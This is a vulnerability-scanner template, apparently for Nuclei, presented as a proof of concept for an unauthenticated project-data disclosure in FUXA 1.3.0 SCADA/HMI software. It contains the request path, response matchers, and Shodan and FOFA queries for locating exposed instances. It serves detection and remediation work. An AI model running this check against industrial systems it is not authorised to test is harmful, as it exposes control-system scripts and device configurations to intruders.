FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates
a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.
PoC
id: CVE-2026-47717
info:
name: FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure
author: pussycat0x
severity: high
description: |
FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates
a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.
remediation: |
Upgrade to fuxa-server version 1.3.1 or later.
reference:
- https://github.com/advisories/GHSA-q3w6-q3hc-c5x6
- https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-47717
epss-score: 0.01375
epss-percentile: 0.71169
cwe-id: CWE-201
metadata:
verified: true
max-request: 1
vendor: frangoteam
product: fuxa
shodan-query: http.title:"FUXA"
fofa-query: title="FUXA"
tags: cve,cve2026,fuxa,ics,scada,unauth,exposure
http:
- method: GET
path:
- "{{BaseURL}}/api/project"
headers:
Accept: application/json
matchers:
- type: dsl
dsl:
- 'contains_all(body, "\"devices\"", "\"hmi\"", "\"scripts\"", "\"views\"")'
- 'contains_any(body, "\"polling\"", "\"svgcontent\"", "\"ModbusTCP\"", "\"bkcolor\"")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402201dc40cba5f45ea9632d3fb2fa118d9bfbe730a95ff2945973a0be0d3fa0b91f8022032f83b4c56a1e3fba3cdc3a9451bfab496aac6aaca8cc630ae05af95c56b7176:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.